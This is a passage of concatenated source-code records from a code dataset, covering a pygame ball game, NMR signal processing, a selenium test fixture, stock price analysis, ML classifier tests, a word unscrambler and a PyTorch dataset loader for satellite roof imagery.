LOAD LEVEL WORLD\r\n\r\n\tworld_data, level_length = load_level(level)\r\n\tw = World(objects_groups)\r\n\tw.generate_world(world_data, win)\r\n\r\n\treturn world_data, level_length, w\r\n\r\ndef reset_player():\r\n\tp = Ball(WIDTH//2, 50)\r\n\tmoving_left = False\r\n\tmoving_right = False\r\n\r\n\treturn p, moving_left, moving_right\r\n\r\nworld_data, level_length, w = reset_level(level)\r\np, moving_left, moving_right = reset_player()\r\n\r\n# VARIABLES *******************************************************************\r\n\r\nmoving_left = False\r\nmoving_right = False\r\nscreen_scroll = 0\r\nlevel_scroll = 0\r\nSCROLL_THRES = 80\r\n\r\nrunning = True\r\nwhile running:\r\n\twin.fill(BLUE)\r\n\r\n\r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\trunning = False\r\n\r\n\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\tif event.key == pygame.K_ESCAPE or \\\r\n\t\t\t\tevent.key == pygame.K_q:\r\n\t\t\t\trunning = False\r\n\r\n\t\tif event.type == pygame.KEYDOWN:\r\n\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\tmoving_left = True\r\n\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\tmoving_right = True\r\n\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\tif not p.jump:\r\n\t\t\t\t\tp.jump = True\r\n\r\n\t\tif event.type == pygame.KEYUP:\r\n\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\tmoving_left = False\r\n\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\tmoving_right = False\r\n\r\n\tw.draw_world(win, screen_scroll)\r\n\r\n\tspikes_group.update(screen_scroll)\r\n\tspikes_group.draw(win)\r\n\tinflator_group.update(screen_scroll)\r\n\tinflator_group.draw(win)\r\n\tdeflator_group.update(screen_scroll)\r\n\tdeflator_group.draw(win)\r\n\r\n\tscreen_scroll = 0\r\n\tp.update(moving_left, moving_right, w, collision_groups)\r\n\tp.draw(win)\r\n\r\n\tif ((p.rect.right >= WIDTH - SCROLL_THRES) and level_scroll < (level_length * 16) - WIDTH) \\\r\n\t\t\tor ((p.rect.left <= SCROLL_THRES) and level_scroll > 0):\r\n\t\t\tdx = p.dx\r\n\t\t\tp.rect.x -= dx\r\n\t\t\tscreen_scroll = -dx\r\n\t\t\tlevel_scroll += dx\r\n\r\n\tif pygame.sprite.spritecollide(p, spikes_group, False):\r\n\t\tworld_data, level_length, w = reset_level(level)\r\n\t\tp, moving_left, moving_right = reset_player()\r\n\t\tscreen_scroll = 0\r\n\t\tlevel_scroll = 0\r\n\r\n\r\n\tpygame.draw.rect(win, (255, 255,255), (0, 0, WIDTH, HEIGHT), 2, border_radius=5)\r\n\tclock.tick(FPS)\r\n\tpygame.display.update()\r\n\r\npygame.quit()","sub_path":"Bounce/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"555431374","text":"# -*- coding: utf-8 -*-\n\"\"\"The Event class.\"\"\"\nfrom sys import modules\nfrom typing import List\nfrom typing import Union\n\nimport csdmpy as cp\nfrom pydantic import BaseModel\n\nfrom ._base import AbstractOperation\n\n__author__ = \"Maxwell C. Venetos\"\n__email__ = \"maxvenetos@gmail.com\"\n\n\nclass SignalProcessor(BaseModel):\n \"\"\"\n Signal processing class to apply a series of operations to the dependent variables\n of the simulation dataset.\n\n Attributes\n ----------\n\n operations: List\n A list of operations.\n\n Examples\n --------\n\n >>> post_sim = SignalProcessor(operations=[o1, o2]) # doctest: +SKIP\n \"\"\"\n\n processed_data: cp.CSDM = None\n operations: List[AbstractOperation] = []\n\n class Config:\n validate_assignment = True\n arbitrary_types_allowed = True\n\n @classmethod\n def parse_dict_with_units(self, py_dict):\n \"\"\"Parse a list of operations dictionary to a SignalProcessor class object.\n\n Args:\n pt_dict: A python dict object.\n \"\"\"\n lst = []\n for op in py_dict[\"operations\"]:\n if \"type\" in op.keys():\n lst.append(\n getattr(\n getattr(modules[__name__], op[\"function\"]), op[\"type\"]\n ).parse_dict_with_units(op)\n )\n else:\n lst.append(\n getattr(modules[__name__], op[\"function\"]).parse_dict_with_units(op)\n )\n return SignalProcessor(operations=lst)\n\n def json(self):\n \"\"\"\n Serialize the SignalProcessor object to a JSON compliant python dictionary\n object, where physical quantities are represented as string with a value and a\n unit.\n\n Returns:\n A Dict object.\n \"\"\"\n lst = []\n for i in self.operations:\n lst += [i.json()]\n op = {}\n\n op[\"operations\"] = lst\n return op\n\n def apply_operations(self, data, **kwargs):\n \"\"\"\n Function to apply all the operation functions in the operations member of a\n SignalProcessor object. Operations applied sequentially over the data member.\n\n Returns:\n CSDM object: A copy of the data member with the operations applied to it.\n \"\"\"\n if not isinstance(data, cp.CSDM):\n raise ValueError(\"The data must be a CSDM object.\")\n # copy_data = data.copy()\n for filters in self.operations:\n data = filters.operate(data)\n self.processed_data = data\n\n return data\n\n\nclass Scale(AbstractOperation):\n \"\"\"\n Scale the amplitudes of all dependent variables from a CSDM object.\n\n Args:\n float factor: The scaling factor. The default value is 1.\n\n Example\n -------\n\n >>> import mrsimulator.signal_processing as sp\n >>> operation1 = sp.Scale(factor=20)\n \"\"\"\n\n factor: float = 1\n\n def operate(self, data):\n r\"\"\"Applies the operation for which the class is named for.\n\n .. math::\n f(\\vec(x)) = scale*\\vec(x)\n\n Args:\n data: CSDM object\n \"\"\"\n data *= self.factor\n return data\n\n\nclass IFFT(AbstractOperation):\n \"\"\"\n Apply an inverse Fourier transform on all dependent variables of the CSDM object.\n\n Args:\n int dim_index: Dimension index along which the function is applied.\n\n Example\n -------\n\n >>> operation2 = sp.IFFT(dim_index=0)\n \"\"\"\n\n dim_index: Union[int, list, tuple] = 0\n\n def operate(self, data):\n \"\"\"Applies the operation for which the class is named for.\n\n Args:\n data: CSDM object\n \"\"\"\n dim_index = self.dim_index\n if isinstance(dim_index, int):\n dim_index = [dim_index]\n\n for i in dim_index:\n data = data.fft(axis=i)\n return data\n\n\nclass FFT(IFFT):\n \"\"\"\n Apply a forward Fourier transform on all dependent variables of the CSDM object.\n\n Args:\n int dim_index: Dimension index along which the function is applied.\n\n Example\n -------\n\n >>> operation3 = sp.FFT(dim_index=0)\n \"\"\"\n\n\nclass complex_conjugate(AbstractOperation):\n pass\n","sub_path":"src/mrsimulator/signal_processing/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422018896","text":"from selenium import webdriver\nimport time\nimport pytest\n\n\n@pytest.yield_fixture(scope=\"class\")\ndef start_browser():\n baseURL = \"https://invoice-mail.cisbox.com/admin/login\"\n driver = webdriver.Chrome()\n driver.maximize_window()\n driver.implicitly_wait(5)\n driver.get(baseURL)\n yield driver\n","sub_path":"utilities/start_browser.py","file_name":"start_browser.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"510157979","text":"# Filename : functions.py\n# Date : 2018/9/28\nfrom datetime import datetime\nimport random\n\n\ndef get_order_sn():\n\tsn = ''\n\ts = '1234567890qwertyuiopasdfghjklzxcvbnm'\n\tfor i in range(10):\n\t\tsn += random.choice(s)\n\tsn += datetime.now().strftime('%Y%m%d%H%M%S')\n\treturn sn","sub_path":"django_cart/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"570049281","text":"import z\nimport rows\nimport queue\nimport buy\nimport sliding\nimport statistics\n\ndebug = None\nif debug:\n print (\"debugging {}\".format(debug))\n\nstart = 60\neach = 10\nistart = -1*start\nreq = start - 20\ndates = z.getp(\"dates\")\nque = 12\nmodme = start - que + 1\niterations = 14\nfirstdate = dates[istart*iterations]\nprint(\"firstdate : {}\".format( firstdate ))\n\ndef proc(astock):\n closes = sliding.WindowQueue(que)\n lows = sliding.WindowQueue(que, needMin=True)\n mins = list()\n answers = list()\n prevbuy = None\n bought = None\n boughts = list()\n boughts_avgs = list()\n c_close = None\n dailys = list() \n\n citerations = iterations\n myfirstdate = firstdate\n\n # grab a first date that mods into 60\n for i, row in enumerate(rows.getRowsRange(astock, count = 2, date=myfirstdate)):\n pass\n mydate = row['Date']\n while mydate != myfirstdate and citerations > 5:\n citerations -= 1\n myfirstdate = dates[istart*citerations]\n for i, row in enumerate(rows.getRowsRange(astock, count = 2, date=myfirstdate)):\n pass\n mydate = row['Date']\n\n if mydate != myfirstdate:\n return \"NA\", \"NA\", \"NA\", \"NA\", \"NA\"\n\n for i, row in enumerate(buy.getRows(astock, myfirstdate)):\n try:\n c_low = float(row['Low'])\n except:\n print(\"no low? astock: {}\".format( astock))\n return \"NA\", \"NA\", \"NA\", \"NA\", \"NA\"\n\n date = row['Date']\n\n if c_close and c_close > c_low:\n daily_low = round(c_low/c_close,3)\n dailys.append(daily_low)\n\n c_close = float(row[z.closekey])\n\n closes.add_tail(c_close)\n lows.add_tail(min(c_low, c_close))\n if bought == False and (c_low < prevbuy or c_close < prevbuy):\n# print(\"date {} buytgt : {} c_low: {} \".format( date, prevbuy, c_low ))\n bought = True\n\n if closes.full():\n first_close = closes.get()\n lowest = lows.get_minimum()\n chg = round(lowest / first_close,3)\n if chg <= 1:\n mins.append(chg)\n else:\n print (\"HUH!?!?!?!\")\n exit()\n\n lenmins = len(mins)\n# if debug:\n# print(\"{}, lenmins : {} {}\".format( i, lenmins , date))\n if lenmins and not lenmins % modme:\n med_15 = statistics.median(mins)\n means = statistics.mean(mins)\n useme = round(min((med_15 , means)),3)\n tgt_15 = round(useme * c_close,2)\n answers.append((useme, tgt_15))\n \n candrop = round(tgt_15/c_close,3)\n\n if bought == True:\n boughts.append(1)\n if debug:\n print(\"yes {} \".format(date))\n boughts_avgs.append(candrop)\n elif bought == False:\n boughts.append(0)\n if debug:\n print(\"no {} \".format(date))\n boughts_avgs.append(candrop)\n\n if debug:\n print(\"date {} cprice {} {} buytarget:{} can it drop {}\".format(date, c_close, \"bought\" if bought else \"nope\", tgt_15, z.percentage(candrop)))\n\n bought = False\n prevbuy = tgt_15\n closes.clear()\n lows.clear()\n mins = list()\n\n# if len(mins) >= req:\n# med_15 = statistics.median(mins)\n# means = statistics.mean(mins)\n# useme = (med_15 + means) /2\n# tgt_15 = round(useme * c_close,2)\n often = \"NA\"\n try:\n adl = round((statistics.mean(dailys) + statistics.median(dailys))/2,3)\n except:\n adl = \"NA\"\n\n if debug:\n print(\"boughts: {}\".format( boughts))\n print(\"boughts_avgs: {}\".format( boughts_avgs))\n\n if len(boughts) >= 5:\n often = round(statistics.mean(boughts),3)\n\n try:\n avgtgt = round(statistics.mean(boughts_avgs) ,3)\n tgt9 = answers[-1][1]\n med9 = answers[-1][0]\n return med9, tgt9, often, adl, avgtgt\n except:\n print(\"astock: {}\".format( astock))\n return \"NA\", \"NA\", \"NA\", \"NA\", \"NA\"\n\n\ndef procs():\n stocks = [debug.upper()] if debug else z.getp(\"listofstocks\")\n low_target = dict()\n for astock in stocks:\n try:\n low_target[astock] = proc(astock)\n except Exception as e:\n z.trace(e)\n pass\n try:\n print(\"low_target: {}\".format( low_target))\n print(\" med9, tgt9, often, adl, avgtgt\")\n except:\n pass\n if not debug:\n z.setp( low_target, \"low_target\")\n\nif __name__ == '__main__':\n procs()\n","sub_path":"python/zen/drop_finder2.py","file_name":"drop_finder2.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"580661264","text":"from django.test import TestCase\nfrom ml.classifiers import ClassifierFactory\nfrom ml.tests.util import create_sample_dataset\nfrom ml.vectorizers import VectorizerFactory\n\n\nclass BaseClassifierTestCase(TestCase):\n def setUp(self):\n self.dataset_definition, self.dataset, self.target_attribute = create_sample_dataset()\n self.vectorizer = VectorizerFactory.build_vectorizer(self.dataset, self.target_attribute)\n self.classifier, self.metrics = ClassifierFactory.build_binary_random_forest_classifier(\n self.dataset, self.target_attribute, self.vectorizer\n )\n\n def test_class_labels(self):\n class_labels = self.classifier.class_labels\n self.assertIn('True', class_labels)\n self.assertIn('False', class_labels)\n\n def test_is_binary(self):\n self.assertTrue(self.classifier.is_binary)\n\n def test_predict_instances(self):\n instances = self.dataset.instances.all()[0:100]\n predictions = list(self.classifier.predict_instances(instances))\n\n [self.assertLessEqual(prediction, 1.0) for prediction in predictions]\n [self.assertGreaterEqual(prediction, 0.0) for prediction in predictions]\n\n def test_predict_records(self):\n instances = self.dataset.instances.all()[0:100]\n records = [instance.instance for instance in instances]\n predictions = list(self.classifier.predict_records(records))\n\n [self.assertLessEqual(prediction, 1.0) for prediction in predictions]\n [self.assertGreaterEqual(prediction, 0.0) for prediction in predictions]\n\n def test_predict_vectors(self):\n instances = self.dataset.instances.all()[0:100]\n vectors = self.vectorizer.vectorize_instances(instances)\n\n predictions = list(self.classifier.predict_vectors(vectors))\n\n self.assertEqual(len(predictions), 100)\n\n [self.assertLessEqual(prediction, 1.0) for prediction in predictions]\n [self.assertGreaterEqual(prediction, 0.0) for prediction in predictions]\n\n def test_feature_importance(self):\n feature_importances = self.classifier.feature_importances\n self.assertIn('second_boolean_attribute=True', feature_importances)\n\n def test_metrics(self):\n self.assertLessEqual(self.metrics.auc, 1.0)\n self.assertGreaterEqual(self.metrics.auc, 0.0)\n self.assertLessEqual(self.metrics.accuracy, 1.0)\n self.assertGreaterEqual(self.metrics.accuracy, 0.0)\n\n\n\n\n","sub_path":"ml/tests/test_classifiers.py","file_name":"test_classifiers.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"589674404","text":"from pynput.keyboard import Key, Listener, KeyCode\nimport keyboard\n# def key_pressed(key):\n# print(\"Pressed {}\".format(key))\n \n# def key_released(key):\n# # print(\"Released {}\".format('key'))\n# print(\"*\",end='')\n# if key == Key.esc:\n# return False\n \n# # with Listener(on_press = key_pressed,\\\n# # on_release=key_released) as listener:\n# # listener.join()\n# with Listener(on_release=key_released) as listener:\n# listener.join()\nimport curses\nimport os\n\ndef main(win):\n win.nodelay(True)\n key=\"\"\n win.clear() \n win.addstr(\"Detected key:\")\n while 1: \n try: \n key = win.getkey() \n win.clear() \n win.addstr(\"Detected key:\")\n win.addstr(str(key)) \n if key == os.linesep:\n break \n except Exception as e:\n # No input \n pass \nmain()","sub_path":"Lect/나만의단축키만들기/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"653193060","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt \nimport numpy as np\nimport math \na = float(input(\"a: \"))\nb = float(input(\"b: \"))\nc = float(input(\"c: \"))\nd = (b*b)-(4*a*c)\nprint(\"delta = %.2f\" % (d))\n\n#roots\nif (d>0):\n x1 = ((-1*b)-math.sqrt(d))/(2*a)\n x2 = ((-1*b)+math.sqrt(d))/(2*a)\n if (x1>x2):\n x1,x2=x2,x1\n plt.scatter(x1,0, color=\"blue\", label=\"$x_1$ = %.2f\" % (x1))\n plt.scatter(x2,0, color=\"blue\", label=\"$x_2$ = %.2f\" % (x2))\n #axis x limit \n plt.xlim(x1-5, x2+5)\nelif (d==0):\n x0 = ((-1)*b)/(2*a)\n plt.scatter(x0, 0, color=\"blue\", label=\"$x_0$ = %.2f\" % (x0))\n plt.xlim(-10, 10)\nelse:\n print(\"roots = {}\")\n\nplt.title('$\\mathit{f(x) = x^2 + bx + c}$')\n\n# vertex\n[p, q] = [(-1*b)/(2*a), (-1*d)/(4*a)]\nplt.scatter(p,q, color=\"green\", label=\"vertex [%.2f,%.2f]\" % (p,q))\n\n#f(x)\nx=np.arange(-100, 100,0.01)\ny=(a*x**2)+(b*x)+c\n\naxlines_style = (0, (5, 0.75))\n#x=0, y=0 axes\nplt.axhline(y=0, color=\"black\", linestyle=axlines_style)\nplt.axvline(x=0, color=\"black\", linestyle=axlines_style)\nplt.xlabel('x')\nplt.ylabel('y')\n#axis y limit\nif q<0:\n plt.ylim(q-5, (-0.5*q))\nelse:\n plt.ylim((-0.5*q), q+5)\nplt.plot(x,y, color='red', label=\"f(x) = %.2f$x^2$ + %.2fx + %.2f\" % (a,b,c))\nplt.legend()\nplt.show()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"232986664","text":"from google_images_download import google_images_download\r\nimport ssl\r\nssl._create_default_https_context = ssl._create_unverified_context\r\n\r\ndef imageCrawling(keyword, dir):\r\n response = google_images_download.googleimagesdownload()\r\n arguments = {\"keywords\":keyword,\r\n \"limit\":100,\r\n \"print_urls\":True,\r\n \"no_directory\":True,\r\n \"output_directory\":dir}\r\n paths= response.download(arguments)\r\n print(paths)\r\n\r\nimageCrawling(\"모네\",\"D:\\pycharm\\Second_Semester\\crawling\\ temp\")\r\n","sub_path":"crawling.py","file_name":"crawling.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"229585228","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n# pylint: disable=invalid-name\r\n\r\n\"\"\"\r\nAutomate unscrambling words to cheat at sextuple.\r\nhttps://apps.apple.com/us/app/sextuple-word-lite/id291026377\r\nAugust 2019 mlf\r\n\r\nTODO: sort in order of first 6 letter word\r\n\"\"\"\r\n\r\nimport sys\r\nimport itertools\r\n\r\n\r\ndef unscramble(scrambled_word, target_length, dictionary):\r\n \"\"\"\r\n Return a sorted list of words that are in the dictionary and have\r\n length == target_length.\r\n\r\n :param scrambled_word: (str) the word to unscramble.\r\n :param target_length: (int) length of words to consider in the dictionary.\r\n This value is passed to itertools.permutations().\r\n :param dictionary: (set) list of english words to each check candidate word against.\r\n (NOTE: This is an actual dictionary, not the Python data structure.)\r\n :returns : (list) sorted list of words that meet the length criteria.\r\n \"\"\"\r\n word_list = set()\r\n for letters in itertools.permutations(scrambled_word, r=target_length):\r\n # this join is necessary because itertools.permutations returns a tuple\r\n # like this: ('a', 'b', 'c')\r\n candidate = ''.join(letters)\r\n if candidate in dictionary:\r\n word_list.add(candidate)\r\n return sorted(word_list)\r\n\r\n\r\ndef test():\r\n # simple positive test\r\n assert unscramble('tra', 3, {'art', 'rat', 'tar'}) == ['art', 'rat', 'tar']\r\n\r\n # ignore unrelated words in dictionary\r\n assert unscramble('tra', 3, {'art', 'arts', 'rat', 'rats', 'star', 'tar', 'tars'}) == ['art', 'rat', 'tar']\r\n\r\n # word (\"art\") not in dictionary\r\n assert unscramble('tra', 3, {'rat', 'tar'}) == ['rat', 'tar']\r\n\r\n # negative test - wrong target length, expect empty set\r\n assert unscramble('tra', 4, {'art', 'rat', 'tar'}) == []\r\n print('All tests passed')\r\n\r\n # negative test - empty dictionary, expect empty set\r\n assert unscramble('tra', 4, {}) == []\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n Main function\r\n - Read dictionary file(s), call unscramble, and print the list of matching words.\r\n :return: 0 on success or 1 on error\r\n \"\"\"\r\n if len(sys.argv) < 2:\r\n print('Please provide a six letter word to unscramble.')\r\n return 1\r\n\r\n scrambled_word = sys.argv[1]\r\n if len(scrambled_word) != 6:\r\n print('The scrambled word must be exactly six letters long.')\r\n return 1\r\n\r\n # primary dictionary\r\n with open('linuxwords.txt', 'r') as f:\r\n # this is a set comprehension\r\n dictionary = {line.rstrip('\\n') for line in f}\r\n\r\n # also use supplemental dictionary if exists\r\n try:\r\n with open('morewords.txt', 'r') as f:\r\n # this is a set comprehension union with the primary dictionary\r\n dictionary |= {line.rstrip('\\n') for line in f}\r\n except FileNotFoundError:\r\n pass\r\n\r\n # reversed range to print highest value (longest) words first\r\n for length in [6, 5, 4, 3]: # reversed(range(3, 7))\r\n unscrambled_words = unscramble(scrambled_word, length, dictionary)\r\n if unscrambled_words:\r\n print(\"{} letter words\".format(length))\r\n for word in unscrambled_words:\r\n print(word)\r\n else:\r\n print(\"There are no {} letter words\".format(length))\r\n\r\n return 0\r\n\r\n\r\nif __name__ == '__main__':\r\n test()\r\n sys.exit(main())\r\n","sub_path":"unscramble.py","file_name":"unscramble.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"331209893","text":"import os\nfrom .bigtiff import Bigtiff, SpatialMap, BigtiffDataset\nimport json\nimport torch\nimport math\nimport numpy as np\n\nclass STACCarribeanDataset(BigtiffDataset):\n \"\"\"\n Pytorch Dataset for Open AI Carribean Challenge\n Loads TIFF patches and corresponding bounding boxes and labels.\n \"\"\"\n \n _root = r\".\\openai-challenge\\data\"\n _config = {\n \"colombia\" : [\"borde_rural\", \"borde_soacha\"],\n \"guatemala\": [\"mixco_1_and_ebenezer\", \"mixco_3\"],\n # \"st_lucia\" : [\"casteries\", \"dennery\", \"gros_islet\"]\n \"st_lucia\" : [\"dennery\"]\n }\n _classes = [\"concrete_cement\", \n \"healthy_metal\",\n \"incomplete\", \n \"irregular_metal\", \n \"other\"]\n \n # --------------------------------------------------------------------------\n def __init__(self, dataset=\"colombia\", train=True, transform=None):\n \n # Set internal parameters:\n self.Train = train\n self.Name = dataset\n self.Transform = transform\n \n # Load images and instantiate super class:\n images = self.load_images()\n self.GroundTruth = self.load_groundtruth(images)\n \n # Assign patch sizes to bigtiffs based on maximum ROI size:\n self.PatchSize = self.set_patchsize(images)\n stride = [int(p/2) for p in self.PatchSize]\n \n # Sampling policy:\n sampleSet = self.createSamples(images, stride)\n super(STACCarribeanDataset, self).__init__(images, samples=sampleSet)\n \n # Filter samples to the ones that only contain ROIs:\n sampleSet = self.filterSamples(sampleSet)\n self._set_sampling_scheme_(sampleSet)\n \n # --------------------------------------------------------------------------\n def get_classes(self):\n return self._classes\n \n # --------------------------------------------------------------------------\n def __getitem__(self, index):\n # Overloading super class method to only return the first 3 (RGB) \n # channels of the patch.\n \n patch, rois = super().__getitem__(index)\n patch = patch[:,:,:-1]\n \n # Transform the image if applicable:\n if not self.Transform is None:\n # Get patch origin to convert ROI coordinates to patch coordinates.\n patch_origin = self.Samples[index, 1:]\n patch_origin = np.tile(patch_origin, 2)\n rois[:,:4] = rois[:,:4] - patch_origin\n \n # Transform:\n outputs = self.Transform({'image': patch, 'ROI': rois})\n patch = outputs['image']\n rois = outputs['ROI']\n \n \"\"\"\n # Convert them back to global image coordinates:\n if torch.is_tensor(rois):\n rois = rois + torch.from_numpy(patch_origin)\n elif type(rois) is numpy.ndarray:\n rois = rois + patch_origin\n else:\n raise TypeError('Must be numpy array or torch tensor.')\n \"\"\"\n \n return patch, rois, index\n \n # --------------------------------------------------------------------------\n def __getrois__(self, index):\n \n # Get the sample patch at specified index:\n sample = self.Samples[index]\n \n # From the list of available ROIs, identify the ones that lie inside \n # this patch:\n regions = list(self.BigTIFFs.keys())\n sample_region = regions[sample[0]]\n btif = self.BigTIFFs[sample_region]\n patch_origin = sample[1:]\n patch_end = patch_origin + btif.PatchSize[btif.DirectoryID] - 1\n \n rois = self.GroundTruth[sample_region]['ROI']\n \n if rois.size != 0:\n inside = ((rois[:,0] >= patch_origin[0]) &\n (rois[:,2] <= patch_end[0]) &\n (rois[:,1] >= patch_origin[1]) &\n (rois[:,3] <= patch_end[1]))\n rois = rois[inside, :]\n \n return rois\n \n # --------------------------------------------------------------------------\n def collate(self, batch):\n \"\"\"Collation function to be used with data loaders\"\"\"\n \n images = []\n indices = []\n roi_size = 5 if self.Train else 4\n rois = torch.zeros((len(batch), 20, roi_size), dtype=torch.float32)\n rois = rois.to(batch[0][1].device)\n \n for _b in range(len(batch)):\n # Accumulate patches:\n images.append(batch[_b][0].to(torch.float32))\n indices.append(batch[_b][2])\n \n # Accumulate ROI:\n \"\"\"\n image_num = torch.Tensor([_b]).expand(batch[_b][1].size(0))\n image_num = image_num.type(batch[_b][1].dtype).view(-1,1)\n image_num = image_num.to(batch[_b][1].device)\n _roi = torch.cat([image_num, batch[_b][1]], dim=1)\n rois = torch.cat([rois, _roi], dim=0)\n \"\"\"\n num_boxes = batch[_b][1].size(0)\n rois[_b,:num_boxes,:] = batch[_b][1]\n \n \n # Stack outputs and return\n batch = [torch.stack(images, dim=0), rois, torch.Tensor(indices)]\n return batch\n \n # --------------------------------------------------------------------------\n def load_images(self):\n \"\"\"\n Use the Colombia dataset:\n \"\"\"\n \n # Create BigTiff objects for dataset images:\n images = {}\n for dataset in self.Name:\n for region in self._config[dataset]:\n reg_dir = os.path.join(self._root, dataset, region)\n imgfile = '{0}_ortho-cog.tif'.format(region)\n imgfile = os.path.join(reg_dir, imgfile)\n btif = Bigtiff(imgfile)\n \n # Load extents in world coordinates and setup the spatial maps:\n meta_json = '{0}-imagery.json'.format(region)\n meta_json = os.path.join(reg_dir, meta_json)\n with open(meta_json, 'r') as fid:\n _meta = fid.read()\n metadata = json.loads(_meta)\n _xmin, _ymin, _xmax, _ymax = metadata['bbox']\n \n # Create spatial mapping for each image level:\n refmaps = [SpatialMap(imsize, [_xmin, _xmax], [_ymin, _ymax]) \n for imsize in btif.ImageSize]\n btif.setSpatialMap(refmaps)\n \n images[region] = btif\n \n return images\n \n # --------------------------------------------------------------------------\n def load_groundtruth(self, images):\n \"\"\"\n Parse JSON\n \"\"\"\n groundtruth = {}\n \n for dataset in self.Name:\n for region in self._config[dataset]:\n # Identify the JSON file that holds ground truth:\n if self.Train:\n _json = 'train-{0}.geojson'.format(region)\n else:\n _json = 'test-{0}.geojson'.format(region)\n\n reg_dir = os.path.join(self._root, dataset, region)\n _json = os.path.join(reg_dir, _json)\n \n # Decode the JSON:\n with open(_json, 'r') as fid:\n json_data = fid.read()\n _jsonDict = json.loads(json_data)\n features = _jsonDict[\"features\"]\n \n # Concatenate all features:\n roi_sz = (len(features),5) if self.Train else (len(features),4)\n rois = np.zeros(roi_sz, dtype=np.float)\n roi_ids = []\n \n for n, roi in enumerate(features):\n roi_id = roi['id']\n coordinates = np.array(roi['geometry']['coordinates'])\n \n if len(coordinates.shape) != 3:\n # NOTE: Some data points have ROI coodinates provided as\n # two disjoint sets of ROI. For this flatten the \n # list before creating the array.\n coordinates = coordinates[0][0]\n\n coordinates = np.reshape(coordinates, (-1,2))\n \n # NOTE: Some ROIs are polygonal due to the shape of the \n # roof not being quadrilateral, these data points are \n # aggregated to an enclosing quadrilateral as the \n # network is only capable of detecting bounding boxes.\n _top_left = np.amin(coordinates, axis=0)\n _bot_right = np.amax(coordinates, axis=0)\n \n # Append the roi label info:\n bbox = np.append(_top_left, _bot_right)\n if self.Train:\n material = roi['properties']['roof_material']\n cls_label = np.array(self._classes.index(material))\n bbox = np.append(bbox, cls_label)\n \n rois[n,:] = bbox\n roi_ids += [roi_id]\n\n # Rearrange the labels into [y1 x2 y2 x2] format:\n if self.Train:\n rois = rois[:,[1,0,3,2,4]]\n else:\n rois = rois[:,[1,0,3,2]]\n \n # Convert the ROI coordinates from latitude and longitude \n # coordinates to image row-col.\n btif = images[region]\n refmap = btif.SpatialMapping[btif.DirectoryID]\n \n # Correct Y coordinate notation and set the origin to top-left:\n # NOTE: Doing this will flip the ymin and ymax coordinates as they \n # would now correspond to opposite corners.\n rois[:,[2,0]] = refmap.YLimits[1] - \\\n (rois[:,[0,2]] - refmap.YLimits[0])\n \n rois[:,[0,1]] = refmap.spatial2Image(rois[:,[1,0]])\n rois[:,[2,3]] = refmap.spatial2Image(rois[:,[3,2]])\n \n # Add to dictionary:\n groundtruth[region] = {\"ID\": roi_ids, \"ROI\": rois}\n \n return groundtruth\n \n # --------------------------------------------------------------------------\n def set_patchsize(self, images):\n # Strategy: For each image, obtain the maximum possible ROI height and \n # width. The global patch size (the size of network input) is \n # set to the nearest (ceil) power of 2 for all images in the \n # dataset.\n \n # Compute maximum size:\n _psize = 0;\n for region in images:\n btif = images[region]\n roi = self.GroundTruth[region]['ROI']\n height = roi[:,2] - roi[:,0] + 1\n width = roi[:,3] - roi[:,1] + 1\n _psize = max(_psize, \n np.maximum(np.amax(height), np.amax(width)).item())\n \n # Adjust the patch size to nearest (ceil) power of two and update the \n # bigTIFFs.\n _psize = np.power(2, np.floor(np.log2(_psize))).astype(np.int).item()\n \n for region in images:\n btif = images[region]\n btif.PatchSize[btif.DirectoryID] = [_psize, _psize]\n \n return [_psize, _psize]\n \n # --------------------------------------------------------------------------\n def count_classes(self, index=None):\n \"\"\"Compute the class count of ROIs for each sample.\"\"\"\n \n if index is None:\n index = np.arange(self.Samples.shape[0])\n elif isinstance(index, int):\n index = [index]\n \n count = np.zeros((len(index), len(self._classes)), dtype=np.int)\n for _ind in range(len(index)):\n rois = self.__getrois__(index[_ind])\n count[_ind, :] = np.bincount(rois[:,4].astype(np.int), \n minlength=len(self._classes))\n \n return count\n \n # --------------------------------------------------------------------------\n def balance_classes(self, classids):\n \"\"\"Balance ROI instances across the dataset\n \n Arguments:\n ClassIDs - Define the set of classes that should be considered while sample balancing. Helps ignore labels that are inconsequential.\n \"\"\"\n \n # Get ROI class counts for each sample patch:\n samples = self.SampleID\n counts = self.count_classes(samples)\n counts = counts[:, classids]\n totalcount = np.sum(counts, axis=0)\n \n # Find the class with minimum and maximum total count:\n c_min = np.argmin(totalcount)\n c_max = np.argmax(totalcount)\n \n # Class balancing is performed as long as the min-max class ratio is \n # not 